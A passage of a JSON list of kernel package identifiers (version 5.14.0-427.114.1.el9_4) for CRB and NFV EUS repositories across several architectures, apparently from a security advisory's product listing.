"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
